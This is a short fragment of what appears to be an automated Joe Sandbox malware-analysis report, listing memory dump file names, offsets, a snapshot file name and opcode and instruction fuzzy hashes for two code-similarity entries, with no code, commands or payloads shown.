                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                  • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                                  • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                                  • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2698812504.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2698795000.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.2698843483.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_EozUxz4ybi.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                  • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                  • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64